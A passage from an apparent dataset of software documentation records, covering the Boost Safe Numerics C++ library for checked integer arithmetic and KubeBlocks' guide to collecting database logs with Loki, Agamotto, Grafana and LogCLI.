(x + y) << std::endl;\n std::cout << \"(x - y) = \" << safe_format (x - y) << std::endl;\n return z;\n}\nint main(int argc, const char * argv[]){\n std::cout << \"example 84:\\n\" ;\n input_safe_t x, y;\n try{\n std::cin >> x >> y; // read varibles, maybe throw exception\n }\n catch (const std::exception & e){\n // none of the above should trap. Mark failure if they do\n std::cout << e.what() << std::endl;\n return 1;\n }\n std::cout << \"x\" << safe_format (x) << std::endl;\n std::cout << \"y\" << safe_format (y) << std::endl;\n std::cout << safe_format (f(x, y)) << std::endl;\n return 0;\n}\n•As before, we define a type safe_t to reflect our view of legal values for this program. This uses automatic type\npromotion policy as well as trap_exception exception policy to enforce elimination of runtime penalties.\n•The function f accepts only arguments of type safe_t so there is no need to check the input values. This performs the\nfunctionality of programming by contract with no runtime cost.\n•In addition, we define input_safe_t to be used when reading variables from the program console. Clearly, these can\nonly be checked at runtime so they use the throw_exception policy. When variables are read from the console they are\nchecked for legal values. We need no ad hoc code to do this, as these types are guaranteed to contain legal values and will\nthrow an exception when this guarantee is violated. In other words, we automatically get checking of input variables with\nno additional programming.\n•On calling of the function f, arguments of type input_safe_t are converted to values of type safe_t . In this particular\nexample, it can be determined at compile time that construction of an instance of a safe_t from an input_safe_t can\nnever fail. Hence, no try/catch block is necessary. The usage of the trap_exception policy for safe_t types would\ncause a compile time error.\n8Correct Integer Operations With\nMinimal Runtime Penalties\nHere is the output from the program when values 12 and 32 are input from the console:\nexample 84:\n12 32\nx<signed char>[-24,82] = 12\ny<signed char>[-24,82] = 32\nz = <short>[-48,164] = 44\n(x + y) = <short>[-48,164] = 44\n(x - y) = <short>[-106,106] = -20\n<short>[-48,164] = 44\n3. Background\nThis library is a re-implementation of the facilities provided by David LeBlanc's SafeInt Library using C++14 and the Boost\nLibraries. I found this library very well done in every way. My main usage was to run unit tests for my embedded systems\nprojects on my PC. Still, I had a few issues.\n•It was a lot of code in one header - 6400 lines. Very unwieldy to understand, modify and maintain.\n•I couldn't find separate documentation other than that in the header file.\n•It didn't use Boost conventions for naming.\n•It required porting to different compilers.\n•It had a very long license associated with it.\n•I could find no test suite for the library.\nThis version addresses these issues. It exploits Boost facilities such as template metaprogramming to reduce the number of\nlines of source code to approximately 4700. It exploits the Boost Preprocessor Library to generate exhaustive tests.\nAll concepts, types and functions documented are declared in the name space boost::numeric .\n4. Library Internals\nThis library should compile and run correctly on any conforming C++14 compiler.\nThe Safe Numerics library is implemented in terms of some more fundamental software components described here. It is not\nnecessary to know about these components to use the library. This information has been included to help those who want to\nunderstand how the library works so they can extend it, correct bugs in it, or understand it's limitations. These components\nare also interesting in their own right. For all these reasons, they are documented here. In general terms, the library works in\nthe following manner:\n•All unary/binary expressions where one of the operands is a \"safe\" type are Overloaded. These overloads are declared and\ndefined in the header file \"safe_integer.hpp\". SFINAE - \"Substitution Failure Is Not An Error and std::enable_if are\nkey features of C++ used to define these overloads in a correct manner.\n•Each overloaded operation implements the following:\n•Retrieve range of values for each operand of type T from std::numeric_limits<T>::min() and\nstd::numeric_limits<T>::max() .\n•Given the ranges of the operands, determine the range of the result of the operation using interval arithmetic. This is\nimplemented in the \"interval.hpp\" header file using constexpr facility of C++14.\n9Correct Integer Operations With\nMinimal Runtime Penalties\n•if the range of the result type includes the range of the result of the operation, no run time checking of the result is\nnecessary. So the operation reduces to the original built-in C/C++ operation.\n•Otherwise, the operation is implemented as a \"checked integer operation\" at run time. This operation returns a variant\nwhich will contain either a correct result or an exception enum indicating why a correct result could not be obtained.\nThe variant object is implemented in the header file \"checked_result.hpp\" and the checked operations are implemented\nin \"checked.hpp\".\n•if a valid result has been obtained, it is passed to the caller.\n•Otherwise, an exception is invoked.\n5. Rationale and FAQ\n5.1.Is this really necessary? If I'm writing the program with the requisite care and competence, problems noted in the\nintroduction will never arise. Should they arise, they should be fixed \"at the source\" and not with a \"band aid\" to\ncover up bad practice.\nThis surprised me when it was first raised. But some of the feedback I've received makes me thing that it's a widely\nheld view. The best answer is to consider the examples in the Tutorials and Motivating Examples section of the\nlibrary documentation.\n5.2.Can safe types be used as drop-in replacement for built-in types?\nAlmost. Replacing all built-in types with their safe counterparts should result in a program that will compile and\nrun as expected. In some cases compile time errors will occur and adjustments to the source code will be required.\nTypically these will result in code which is more correct.\n5.3.Why is Boost.Convert not used?\nI couldn't figure out how to use it from the documentation.\n5.4.Why is the library named \"safe ...\" rather than something like \"checked ...\" ?\nI used \"safe\" in large part this is what has been used by other similar libraries. Maybe a better word might have\nbeen \"correct\" but that would raise similar concerns. I'm not inclined to change this. I've tried to make it clear in the\ndocumentation what the problem that the library addressed is.\n5.5.Given that the library is called \"numerics\" why is floating point arithmetic not addressed?\nActually, I believe that this can/should be applied to any type T which satisfies the type requirement \"Numeric\" type\nas defined in the documentation. So there should be specializations safe<float> and related types as well as new\ntypes like safe<fixed_decimal> etc. But the current version of the library only addresses integer types. Hopefully\nthe library will evolve to match the promise implied by its name.\n5.6.Isn't putting a defensive check just before any potential undefined behavior is often considered a bad practice?\nBy whom? Is leaving code which can produce incorrect results better? Note that the documentation contains\nreferences to various sources which recommend exactly this approach to mitigate the problems created by this C/C++\nbehavior. See [ Seacord]\n5.7.It looks like the implementation presumes two's complement arithmetic at the hardware level. So this library is not\nportable - correct? What about other hardware architectures?\nAs far as is known as of this writing, the library does not presume that the underlying hardware is two's compliment.\nHowever, this has yet to be verified in a rigorous way.\n10Correct Integer Operations With\nMinimal Runtime Penalties\n5.8.Why do you specialize numeric_limits for \"safe\" types? Do you need it?\nsafe<T> behaves like a \"number\" just as int does. It has max, min, etc Any code which uses numeric limits to test a\ntype T should works with safe<T> . safe<T> is a drop-in replacement for T so it has to implement all the operations.\n5.9.According to C/C++ standards, unsigned integers cannot overflow - they are modular integers which \"wrap around\".\nYet the safe numerics library detects and traps this behavior as errors. Why is that?\nThe guiding purpose of the library is to trap incorrect arithmetic behavior - not just undefined behavior. Although a\nsavvy user may understand and keep present in his mind that an unsigned integer is really a modular type, the plain\nreading of an arithmetic expression conveys the idea that all operands are integers. Also in many cases, unsigned\nintegers are used in cases where modular arithmetic is not intended, such as array indexes. Finally, the modulus for\nsuch an integer would vary depending upon the machine architecture. For these reasons, in the context of this library,\nan unsigned integer is considered to a representation of a subset of integers. Note that this decision is consistent with\n[INT30-C], “Ensure that unsigned integer operations do not wrap” in the CERT C Secure Coding Standard [ Seacord].\n5.10.Why does the library require C++14?\nThe original version of the library used C++11. Feedback from CPPCon, Boost Library Incubator and Boost\ndeveloper's mailing list convinced me that I had to address the issue of run-time penalty much more seriously.\nI resolved to eliminate or minimize it. This led to more elaborate meta-programming. But this wasn't enough. It\nbecame apparent that the only way to really minimize run-time penalty was to implement compile-time integer range\narithmetic - a pretty elaborate sub library. By doing range arithmetic at compiler-time, I could skip runtime checking\non many/most integer operations. C++11 constexpr wasn't quite enough to do the job. C++14 constexpr can do the\njob. The library currently relies very heavily on C++14 constexpr. I think that those who delve into the library will\nbe very surprised at the extent that minor changes in user code can produce guaranteed correct integer code with zero\nrun-time penalty.\n5.11.This is a C++ library - yet you refer to C/C++. Which is it?\nC++ has evolved way beyond the original C language. But C++ it's still (mostly) compatible with C. So most C\nprograms can be compiled with a C++ compiler. The problems of incorrect arithmetic afflict both C and C++.\nSuppose we have a legacy C program designed for some embedded system.\n•Replace all int declarations with int16_t and all long declarations with int32_t .\n•Create a file containing something like the following and include it at the beginning of every source file.\n#ifdef TEST\n// using C++ on test platform\n#include <cstdint >\n#include <safe_integer .hpp>\n#include <cpp.hpp>\nusing pic16_promotion = boost::numeric ::cpp<\n 8, // char\n 8, // short\n 8, // int\n 16, // long\n 32 // long long\n>;\n// define safe types used desktop version of the program.\ntemplate <typename T> // T is char, int, etc data type\nusing safe_t = boost ::numeric ::safe<\n T,\n pic16_promotion ,\n boost::numeric ::throw_exception // use for compiling and running tests\n>;\n11Correct Integer Operations With\nMinimal Runtime Penalties\ntypedef safe_t <std::int16_t > int16_t ;\ntypedef safe_t <std::int32_t > int32_t ;\n#else\n/* using C on embedded platform */\ntypedef int int16_t ;\ntypedef long int32_t ;\n#endif\n•Compile tests on the desktop with a C++14 compiler and with the macro TEST defined.\n•Run the tests and change code to address any thrown exceptions.\nThis example illustrates how this library, implemented with C++14 can be useful in the development of correct code\nfor programs written in C.\n6. Current Status\nThe library is currently in the Boost Review Queue . The proposal submission can be found in the Boost Library Incubator\n•The library is currently limited to integers.\n•Conversions to safe integer types from floating point types is not explicitly addressed.\n•Note that standard library stream conversion functions such as strtoi etc. DO check for valid input and throw the\nexception std::out_of_range if the string cannot be converted to the specified integer type. In other words, strtoi\nalready contains some of the functionality that safe<int> provides.\n•Although care was taking to make the library portable, it's likely that at least some parts of the implementation -\nparticularly checked arithmetic - depend upon two's complement representation of integers. Hence the library is probably\nnot currently portable to other architectures.\n•Currently the library permits a safe<int> value to be uninitialized. This supports the goal of \"drop-in\" replacement of C+\n+/C built-in types with safe counter parts. On the other hand, this breaks the \"always valid\" guarantee.\n•The library is not quite a \"drop-in\" replacement for all built-in integer types. In particular, C/C++ implements implicit\nconversions and promotions between certain integer types which are not captured by the operation overloads used to\nimplement the library. In practice these case are few and can be addressed with minor changes to the user program to avoid\nthese silent implicit conversions.\n7. Acknowledgements\nThis library would never have been created without inspiration, collaboration and constructive criticism from multiple\nsources.\nDavid LaBlanc This library is inspired by David LeBlanc's SafeInt Library . I found this library very well\ndone in every way and useful in my embedded systems work. This motivated me to take\nto the \"next level\".\nAndrzej Krzemienski Andrzej Commented and reviewed the library as it was originally posted on the Boost\nLibrary Incubator . The the consequent back and forth motivated me to invest more effort\nin developing documentation and examples to justify the utility, indeed the necessity, for\nthis library. He also noted many errors in code, documentation, and tests. Without his\ninterested and effort, I do not believe the library would have progressed beyond it's initial\nstages.\n12Correct Integer Operations With\nMinimal Runtime Penalties\nBoost As always, the Boost Developer's mailing list has been the source of many useful\nobservations from potential users and constructive criticism from very knowledgeable\ndevelopers.\n8. Bibliography\n[coker] Zack Coker. Samir Hasan. Jeffrey Overbey. Munawar Hafiz. Christian Kästner. Integers In C: An Open Invitation\nTo Security Attacks? . JTC1/SC22/WG21 - The C++ Standards Committee - ISOCPP . January 15, 2012. Coker\n[crowl1] Lawrence Crowl. C++ Binary Fixed-Point Arithmetic . JTC1/SC22/WG21 - The C++ Standards Committee -\nISOCPP . January 15, 2012. Crowl\n[crowl2] Lawrence Crowl. Thorsten Ottosen. Proposal to add Contract Programming to C++ . WG21/N1962 and\nJ16/06-0032 - The C++ Standards Committee - ISOCPP . February 25, 2006. Crowl & Ottosen\n[dietz] Will Dietz. Peng Li. John Regehr. Vikram Adve. Understanding Integer Overflow in C/C++ . Proceedings of the\n34th International Conference on Software Engineering (ICSE), Zurich, Switzerland . June 2012. Dietz\n[garcia] J. Daniel Garcia. C++ language support for contract programming . WG21/N4293 - The C++ Standards\nCommittee - ISOCPP . December 23, 2014. Garcia\n[katz] Omer Katz. SafeInt code proposal . Boost Developer's List . Katz\n[keaton] David Keaton, Thomas Plum, Robert C. Seacord, David Svoboda, Alex Volkovitsky, and Timothy Wilson. As-if\nInfinitely Ranged Integer Model . Software Engineering Institute . CMU/SEI-2009-TN-023.\n[leblanc1] David LeBlanc. Integer Handling with the C++ SafeInt Class . Microsoft Developer Network . January 7, 2004.\nLeBlanc\n[leblanc2] David LeBlanc. SafeInt . CodePlex . Dec 3, 2014. LeBlanc\n[lions] Jacques-Louis Lions. Ariane 501 Inquiry Board report . Wikisource . July 19, 1996. Lions\n[matthews] Hubert Matthews. CheckedInt: A Policy-Based Range-Checked Integer . Overload Journal #58 . December\n2003. Matthews\n[mouawad] Jad Mouawad. F.A.A Orders Fix for Possible Power Loss in Boeing 787 . New York Times. April 30, 2015.\n[plakosh] Daniel Plakosh. Safe Integer Operations . U.S. Department of Homeland Security . May 10, 2013. Plakosh\n[seacord1] Robert C. Seacord. Secure Coding in C and C++ . 2nd Edition. Addison-Wesley Professional. April 12, 2013.\n978-0321822130. Seacord\n[seacord2] Robert C. Seacord. INT30-C. Ensure that operations on unsigned integers do not wrap . Software Engineering\nInstitute, Carnegie Mellon University . August 17, 2014. INT30-C\n[seacord3] Robert C. Seacord. INT32-C. Ensure that operations on signed integers do not result in overflow . Software\nEngineering Institute, Carnegie Mellon University . August 17, 2014. INT32-C\n[stroustrup] Bjarn Stroustrup. The C++ Programming Language Fourth Edition . Addison-Wesley . Copyright © 2014 by\nPearson Education, Inc.. January 15, 2012. Stroustrup\n[forum] Forum Posts. C++ Binary Fixed-Point Arithmetic . ISO C++ Standard Future Proposals . Forum\n13" } ]
{ "category": "App Definition and Development", "file_name": "advanced-logs.pdf", "project_name": "KubeBlocks by ApeCloud", "subcategory": "Database" }
[ { "data": "Advanced logs\nCurrently, KubeBlocks supports viewing the running logs, error logs, and slow logs of the running\ndatabase cluster through  kbcli cluster logs . This method is lightweight and only relies on the log\nfiles and tail commands in the target container, without installing any software or plug-ins in the\ncluster or client.\nIts drawbacks are also very obvious. It strongly depends on the survival of the container and the\ncurrent status of log files. If the container is already abnormal or the log file is deleted, this method\ncannot work as expected. The above method is called the  cluster logs  function.\nThe  advanced logs  function can better retain log clues at problem sites, support long-term remote\nbackup of log data, and facilitate integration with external systems.\nThe advanced logs function supports storing log data to the Loki server in the cluster and the remote\nAWS S3 service. The data stored in Loki supports  logcli  client and Grafana console access and\ndisplay. The data stored in S3 supports importing and integrating with other systems for further\nprocessing and analysis.\nAdd-on introduction\nAgamotto, Loki, Prometheus, and other components related to observability are managed by\nKubeBlocks as add-ons. Each of these add-ons has its specialties.\nAgamotto is a collection add-on that collects performance and logs.\nLoki is a storage add-on that stores log data.\nGrafana is a front-end display add-on that displays the observed data.\nLogcli is a front-end search add-on that provides the native LogQL query capability. It is installed\nby  kbcli plugin .\nBefore you start\nInstall kubectl.\nInstall KubeBlocks by kbcli or install KubeBlocks by Helm.Enable advanced logs function\nEnable Loki\nThe Loki add-on stores the log data and accepts the search request from the front end. Refer to the\nLoki official documentation for details.\n:::caution\nBefore enabling the advanced logs function, deploy a Loki node first and then apply Agamotto\ncollection to avoid log data loss.\n:::\n1. View the Loki add-on status to check whether it is enabled.\nkbcli addon list | grep loki\n2. If this add-on is not enabled, run the command below to enable this add-on.\nThis command runs Loki in the  statefulset  mode. KubeBlocks deploys a single-node Loki of\nthe single binary type, i.e. the  target  in the configuration is  all , uses a 10-GB PV to store\ndata, and starts a  loki-gateway  service to receive data.\nkbcli addon enable loki\n>\nNAME TYPE PROVIDER STATUS AUTO-INSTALL AUTO-INS\nloki Helm apecloud Enabled false \nCheck whether this Pod is running.\nkubectl get pods | grep loki\n>\nNAME READY STATUS RESTARTS AGE\nkb-addon-loki-0 1/1 Running 0 47h\nloki-gateway-5f4895c7b-5khv7 1/1 Running 0 47h\n3. Run Grafana to view the status of Loki. For example,4. (Optional) Disable the Agamotto add-on.\nkbcli disabled loki\nBy default, Loki saves the log data of the last 3 days, and the data older than 72 hours will be\nautomatically deleted. You can use the following commands to adjust the storage policy. Note that\nwhen adjusting the policy, you need to pay attention to the host's disk resources and Loki PVC.\nCurrently, Loki does not support size-based retention.\n# The new retention_period must be an integer multiple of 24\nkbcli addon enable loki --set loki.loki.limits_config.retention_period=168h\nRun  kubectl get pv  to view the PV information of the current Loki instance.\nkubectl get pv\n>\nNAME CAPACITY ACCESS MODES RECLAIM POLICY ST\npvc-ed20ec94-9a58-46e4-9c28-b692cba70e79 8Gi RWO Delete B\nIf you want to check the disk usage of the current Loki node, you can use the  exec  command to log\nin to the container and use the  du  command to check the disk usage. For example,1. Log in to the Loki container.\nkubectl exec -it kb-addon-loki-0 -n kb-system -- /bin/sh\n2. Run the  du  command.\ndu -sh /var/loki/*\n>\n152.0K /var/loki/boltdb-shipper-active\n228.0K /var/loki/boltdb-shipper-cache\n7.4M /var/loki/chunks\n4.0K /var/loki/compactor\n64.0K /var/loki/retention\n4.0K /var/loki/rules\n3.5M /var/loki/wal\nEnable Agamotto\nAfter the log collection function is enabled, Agamotto detects two localhost folders,  /var/log/pods \nand  /var/log/kubeblocks . All files that fit the following patterns will be collected.\n /var/log/pods  directory: it stores the standard output of the storage container and the error\nlogs. The file path pattern follows  /var/log/pods/**/**/*.log .\n /var/log/kubeblocks  directory: it can customize the storage of log files storage. By default,\nKubeBlocks stores the logs of database engines, such as error log and slow log. The file path\npattern follows  /var/log/kubeblocks/**/**/*.log .\n1. View the Agamotto add-on status to check whether it is enabled.\nkbcli addon list | grep agamotto\n2. If this add-on is not enabled, run the command below to enable this add-on.\nkbcli addon enable agamotto\n>\nNAME TYPE PROVIDER STATUS AUTO-INSTALL AUTO-INS\nagamotto Helm apecloud Enabled false \nCheck whether this Pod is running.kubectl get pods | grep agamotto\n>\nNAME READY STATUS RESTARTS AGE\nkb-addon-agamotto-kvbr5 1/1 Running 0 44h\n3. Run the command to upgrade the log function of Agamotto.\nkbcli addon enable agamotto --set log.enabled=true\n4. Upload logs to S3.\nBy default, the logs function only restores the log data on the Loki server of the current\nKubernetes cluster and does not upload the log data to the remote S3 server.\nFill in the command below with Access Key, Secret Key, region, and bucket, and run this\ncommand to enable uploading log data to S3.\nkbcli addon enable agamotto --set log.enabled=true,log.s3.enabled=true,log.s3.access\nThe target bucket of the remote S3 creates a directory named after the filename, which stores\nthe real-time data Partition of the corresponding log (partitioned by 5 minutes or 5 MB).\n5. (Optional) Disable the Agamotto add-on.\nkbcli addon disable agamotto\nEnable Grafana\n:::note\nIn the production environment, all monitoring add-ons are disabled by default when installing\nKubeBlocks and Grafana is also included. You can enable Grafana but it is highly recommended to\nbuild your monitoring system or purchase a third-party monitoring service for safety and stability\nconcerns. For integrating a third-party monitoring service, refer to Integrate a third party monitoring\nservice.\n:::\n1. Check whether the Loki and Grafana services are enabled.\nkbcli dashboard list\n>\nNAME NAMESPACE PORT CREATED-TIME \nkubeblocks-grafana default 13000 Jul 08,2023 15:37 UTC+0800 \nkubeblocks-logs default 13100 Jul 08,2023 15:36 UTC+0800 2. Open the dashboard of the container logs.\nkbcli dashboard open kubeblocks-logs\nOr you can go to the Explore page and select Loki to search the logs.\nEnable LogCLI\nkbcli supports the LogCLI plug-in for your convenience of querying logs by command line.\n:::note\nFor more LogCLI and LogQL grammar, refer to the Loki official documentation.\n:::\n1. Install the LogCLI plug-in.\ni. Set the environment variable.\nexport PATH=\"${KBCLI_ROOT:-$HOME/.kbcli}/plugins/bin:$PATH\"ii. Add the  block-index  of ApeCloud as the  krew index .\nkbcli plugin index add default https://github.com/apecloud/block-index.git\niii. View the index status.\nkbcli plugin index list\n>\nINDEX URL \ndefault https://github.com/apecloud/block-index.git \niv. Install the LogCLI plug-in.\nkbcli plugin install default/logcli \nv. View the plug-in status and check whether LogCLI is installed successfully.\nkbcli plugin list | grep logcli\n2. Use the LogCLI.\ni. Set the environment variable of LogCLI. For example, set the  LOKI_ADDR  pointing to the\nlocalhost 3100 port.\nexport LOKI_ADDR=http://localhost:3100\nii. Export the Loki service to the localhost. Note that  port/namespace  should be the same as\nthe settings in the system. For example,\nkubectl port-forward svc/loki-gateway 3100:80 -n kb-system\niii. Use the LogCLi tool to query log data.\nkbcli logcli query '{exporter=\"OTLP\"}'\n>\n2023/07/10 17:30:18 http://localhost:3100/loki/api/v1/query_range?direction=BACK\n2023/07/10 17:30:18 Common labels: {exporter=\"OTLP\", host_ip=\"0.0.0.0\", host_nam\n2023-07-10T17:30:18+08:00 {container=\"nginx\", log_file_path=\"/var/log/pods/kb-sy\n2023-07-10T17:30:18+08:00 {container=\"nginx\", log_file_path=\"/var/log/pods/kb-sy\nMySQL Slow logs and error logs\nBy default, in the ClusterDefinition of MySQL, there is a sidecar container named  metrics  in the\npodSpec definition of the  mysql component .This  metrics  container detects the error logs and slow logs output by the MySQL in real-time, and\ndumps the logs to the host's  /var/log/KubeBlocks  directory. To prevent taking up too much host\ndisk space, the default size of each file is 10 MB, and a maximum of 2 files can be saved.\nIn addition, the Agamotto component deployed on the host detects the  /var/log/KubeBlocks  folder\nin real-time and collects the log data in it to complete the entire log data collection link.- name: metrics\n image: {{ .Values.metrics.image.registry | default \"docker.io\" }}/{{ .Values.metrics\n imagePullPolicy: {{ .Values.metrics.image.pullPolicy | quote }}\n securityContext:\n runAsNonRoot: false\n runAsUser: 0\n env:\n - name: DB_TYPE\n value: MySQL\n - name: ENDPOINT\n value: {{ printf \"localhost:3306\" }}\n - name: MYSQL_USER\n valueFrom:\n secretKeyRef:\n name: $(CONN_CREDENTIAL_SECRET_NAME)\n key: username\n optional: false\n - name: MYSQL_PASSWORD\n valueFrom:\n secretKeyRef:\n name: $(CONN_CREDENTIAL_SECRET_NAME)\n key: password\n optional: false\n command:\n - \"/bin/agamotto\"\n - \"--config=/opt/agamotto/agamotto-config.yaml\"\n ports:\n - name: http-metrics\n containerPort: {{ .Values.metrics.service.port }}\n volumeMounts:\n - name: agamotto-configuration\n mountPath: /opt/agamotto\n - name: data\n mountPath: /data/mysql\n - name: log-data\n mountPath: /var/log/kubeblocks\n readOnly: false" } ]
{ "category": "App Definition and Development", "file_name": "safe_numerics.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Chapter 1. Safe Numerics\nRobert Ramey\nCopyright © 2012-2018 Robert Ramey\nSubject to Boost Software License\nTable of Contents\n1. Introduction ......................................................................................................................................................4\n1.1. Problem ................................................................................................................................................4\n1.2. Solution ................................................................................................................................................5\n1.3. How It Works ........................................................................................................................................5\n1.4. Additional Features .................................................................................................................................6\n1.5. Requirements .........................................................................................................................................6\n1.6. Scope ...................................................................................................................................................6\n2. Tutorial and Motivating Examples .......................................................................................................................7\n2.1. Arithmetic Expressions Can Yield Incorrect Results .....................................................................................7\n2.2. Arithmetic Operations Can Overflow Silently ..............................................................................................8\n2.3. Arithmetic on Unsigned Integers Can Yield Incorrect Results .........................................................................9\n2.4. Implicit Conversions Can Lead to Erroneous Results ..................................................................................10\n2.5. Mixing Data Types Can Create Subtle Errors ............................................................................................12\n2.6. Array Index Value Can Exceed Array Limits .............................................................................................13\n2.7. Checking of Input Values Can Be Easily Overlooked ..................................................................................14\n2.8. Cannot Recover From Arithmetic Errors ...................................................................................................15\n2.9. Compile Time Arithmetic is Not Always Correct .......................................................................................16\n2.10. Programming by Contract is Too Slow ...................................................................................................17\n3. Eliminating Runtime Penalty .............................................................................................................................19\n3.1. Using safe_range and safe_literal .............................................................................................................20\n3.2. Using Automatic Type Promotion ............................................................................................................22\n3.3. Mixing Approaches ...............................................................................................................................24\n4. Case Studies ...................................................................................................................................................26\n4.1. Composition with Other Libraries ............................................................................................................26\n4.2. Safety Critical Embedded Controller ........................................................................................................28\nHow a Stepper Motor Works ................................................................................................................28\nUpdating the Code ..............................................................................................................................29\nRefactor for Testing ............................................................................................................................30\nCompiling on the Desktop ....................................................................................................................30\nTrapping Errors at Compile Time ..........................................................................................................35\nSummary ...........................................................................................................................................45\n5. Background ....................................................................................................................................................46\n6. Type Requirements ..........................................................................................................................................46\n6.1. Numeric<T> .........................................................................................................................................46\nDescription .........................................................................................................................................46\nNotation ............................................................................................................................................47\nAssociated Types ................................................................................................................................47\nValid Expressions ...............................................................................................................................47\nModels..............................................................................................................................................49\nHeader...............................................................................................................................................49\nNote on Usage of std::numeric_limits .............................................................................................49\n6.2. Integer<T> ...........................................................................................................................................49\n1Safe Numerics\nDescription .........................................................................................................................................49\nRefinement of .....................................................................................................................................50\nNotation ............................................................................................................................................50\nValid Expressions ...............................................................................................................................50\nModels..............................................................................................................................................51\nHeader...............................................................................................................................................51\n6.3. PromotionPolicy<PP> ............................................................................................................................51\nDescription .........................................................................................................................................51\nNotation ............................................................................................................................................51\nValid Expressions ...............................................................................................................................52\nModels..............................................................................................................................................52\nHeader...............................................................................................................................................53\n6.4. ExceptionPolicy<EP> ............................................................................................................................53\nDescription .........................................................................................................................................53\nNotation ............................................................................................................................................54\nValid Expressions ...............................................................................................................................54\ndispatch<EP>(const safe_numerics_error & e, const char * msg) .................................................................54\nModels..............................................................................................................................................54\nHeader...............................................................................................................................................55\n7. Types ............................................................................................................................................................55\n7.1. safe<T, PP, EP> ...................................................................................................................................55\nDescription .........................................................................................................................................55\nNotation ............................................................................................................................................55\nAssociated Types ................................................................................................................................55\nTemplate Parameters ............................................................................................................................56\nModel of ...........................................................................................................................................56\nValid Expressions ...............................................................................................................................56\nExamples of use .................................................................................................................................56\nHeader...............................................................................................................................................59\n7.2. safe_signed_range<MIN, MAX, PP, EP> and safe_unsigned_range<MIN, MAX, PP, EP> .................................59\nDescription .........................................................................................................................................59\nNotation ............................................................................................................................................59\nAssociated Types ................................................................................................................................60\nTemplate Parameters ............................................................................................................................60\nModel of ...........................................................................................................................................60\nValid Expressions ...............................................................................................................................60\nExample of use ...................................................................................................................................60\nHeader...............................................................................................................................................62\n7.3. safe_signed_literal<Value, PP , EP> and safe_unsigned_literal<Value, PP, EP> ...............................................62\nDescription .........................................................................................................................................62\nAssociated Types ................................................................................................................................62\nTemplate Parameters ............................................................................................................................62\nModel of ...........................................................................................................................................62\nInherited Valid Expressions ..................................................................................................................62\nExample of use ...................................................................................................................................63\nmake_safe_literal(n, PP, EP) .....................................................................................................63\nHeader...............................................................................................................................................63\n7.4. exception .............................................................................................................................................63\nDescription .........................................................................................................................................63\nenum class safe_numerics_error .............................................................................................................63\nenum class safe_numerics_actions ..........................................................................................................64\nSee Also ............................................................................................................................................64\nHeader...............................................................................................................................................64\n7.5. exception_policy<AE, IDB, UB, UV> ......................................................................................................65\n2Safe Numerics\nDescription .........................................................................................................................................65\nNotation ............................................................................................................................................65\nTemplate Parameters ............................................................................................................................65\nModel of ...........................................................................................................................................65\nInherited Valid Expressions ..................................................................................................................65\nFunction Objects .................................................................................................................................65\nPolicies Provided by the library .............................................................................................................66\nHeader...............................................................................................................................................67\n7.6. Promotion Policies ................................................................................................................................67\nnative................................................................................................................................................67\nautomatic ...........................................................................................................................................68\ncpp<int C, int S, int I, int L, int LL> .....................................................................................................69\n8. Exception Safety .............................................................................................................................................70\n9. Library Implementation ....................................................................................................................................70\n9.1. checked_result<R> ................................................................................................................................72\nDescription .........................................................................................................................................72\nNotation ............................................................................................................................................72\nTemplate Parameters ............................................................................................................................73\nModel of ...........................................................................................................................................73\nValid Expressions ...............................................................................................................................73\nExample of use ...................................................................................................................................74\nSee Also ............................................................................................................................................74\nHeader...............................................................................................................................................74\n9.2. Checked Arithmetic ...............................................................................................................................74\nDescription .........................................................................................................................................74\nType requirements ...............................................................................................................................75\nComplexity ........................................................................................................................................75\nExample of use ...................................................................................................................................75\nNotes................................................................................................................................................75\nSynopsis ............................................................................................................................................75\nSee Also ............................................................................................................................................76\nHeader...............................................................................................................................................76\n9.3. interval<R> ..........................................................................................................................................76\nDescription .........................................................................................................................................76\nTemplate Parameters ............................................................................................................................76\nNotation ............................................................................................................................................77\nAssociated Types ................................................................................................................................77\nValid Expressions ...............................................................................................................................77\nExample of use ...................................................................................................................................78\nHeader...............................................................................................................................................79\n9.4. safe_compare<T, U> .............................................................................................................................79\nSynopsis ............................................................................................................................................79\nDescription .........................................................................................................................................79\nType requirements ...............................................................................................................................79\nComplexity ........................................................................................................................................79\nExample of use ...................................................................................................................................79\nHeader...............................................................................................................................................80\n10. Performance Tests ..........................................................................................................................................80\n11. Rationale and FAQ ........................................................................................................................................80\n12. Pending Issues ...............................................................................................................................................83\n12.1. safe_base Only Works for Scalar Types ...............................................................................................83\n12.2. Other Pending Issues ...........................................................................................................................84\n13. Acknowledgements ........................................................................................................................................84\n14. Release Log ..................................................................................................................................................85\n3Safe Numerics\n15. Bibliography .................................................................................................................................................85\n1. Introduction\nThis library is intended as a drop-in replacement for all built-in integer types in any program which must:\n•be demonstrably and verifiably correct.\n•detect every user error such as input, assignment, etc.\n•be efficient as possible subject to the constraints above.\n1.1. Problem\nArithmetic operations in C/C++ are NOT guaranteed to yield a correct mathematical result. This feature is inherited from the\nearly days of C. The behavior of int, unsigned int and others were designed to map closely to the underlying hardware.\nComputer hardware implements these types as a fixed number of bits. When the result of arithmetic operations exceeds this\nnumber of bits, the result will not be arithmetically correct. The following example illustrates just one example where this causes\nproblems.\nint f(int x, int y){\n // this returns an invalid result for some legal values of x and y !\n return x + y;\n}\nIt is incumbent upon the C/C++ programmer to guarantee that this behavior does not result in incorrect or unexpected operation\nof the program. There are no language facilities which implement such a guarantee. A programmer needs to examine each\nexpression individually to know that his program will not return an invalid result. There are a number of ways to do this. In the\nabove instance, [ INT32-C] seems to recommend the following approach:\nint f(int x, int y){\n if (((y > 0) && (x > (INT_MAX - y))) \n || ((y < 0) && (x < (INT_MIN - y)))) {\n /* Handle error */\n }\n return x + y;\n}\nThis will indeed trap the error. However, it would be tedious and laborious for a programmer to alter his code in this manner.\nAltering code in this way for all arithmetic operations would likely render the code unreadable and add another source of potential\nprogramming errors. This approach is clearly not functional when the expression is even a little more complex as is shown in the\nfollowing example.\nint f(int x, int y, int z){\n // this returns an invalid result for some legal values of x and y !\n return x + y * z;\n}\nThis example addresses only the problem of undefined/erroneous behavior related to overflow of the addition operation as applied\nto the type int. Similar problems occur with other built-in integer types such as unsigned , long, etc. And it also applies to\nother operations such as subtraction, multiplication etc. . C/C++ often automatically and silently converts some integer types\nto others in the course of implementing binary operations. Sometimes such conversions can silently change arithmetic values\nwhich inject errors. The C/C++ standards designate some behavior such as right shifting a negative number as \"implementation\ndefined behavior\". These days machines usually do what the programmer expects - but such behavior is not guaranteed. Relying\n4Safe Numerics\non such behavior will create a program which cannot be guaranteed to be portable. And then there is undefined behavior. In this\ncase, compiler writer is under no obligation to do anything in particular. Sometimes this will unexpectedly break the program.\nAt the very least, the program is rendered non-portable. Finally there is the case of behavior that is arithmetically 